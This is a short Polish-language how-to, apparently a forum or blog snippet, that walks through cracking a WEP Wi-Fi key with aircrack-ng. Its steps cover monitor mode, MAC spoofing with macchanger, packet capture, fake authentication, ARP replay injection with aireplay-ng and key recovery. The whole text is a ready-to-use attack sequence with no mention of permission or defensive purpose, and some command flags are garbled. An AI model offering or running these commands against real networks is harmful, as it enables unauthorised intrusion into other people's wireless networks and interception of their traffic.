• Sprawdzamy dostepne interfejsy: airmon-ng

  • Zatrzymujemy aktualny tryb karty: airmon-ng stop wlan0

  • Zatrzymujemy interfejs: ifconfig wlan0 down

  • Zmieniamy mac adres: macchanger - -mac 00:11:22:33:44:55 wlan0

  • Uruchamiamy interfejs w trybie monitoringu: airmon-ng start wlan0

  • Sprawdzamy dostępne AP i ich parametry: airodump-ng wlan0

  • Crtl + c

  • Uruchamiamy na wybranym kanale: airodump-ng -c [nr_kanalu] -w [nazwa pliku] - -bssid [bssid_ap] wlan0

  • Nowe okno konsoli

  • Uwierzytelniamy się AP: aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 (opcjonalnie -e [essid]) wlan0

  • Uruchamiamy wstrzykiwanie pakietów: aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:55 wlan0

  • Przy przy 15-20 tys IVS możemy przystepować do ataku. Otwieramy nowe okno konsoli

  • Łamiemy hasło: aircrack-ng -n 64 -b [bssid] [nazwa pliku].cap (to nazwa pliku w którym są zebrane ivs)

  • GOTOWE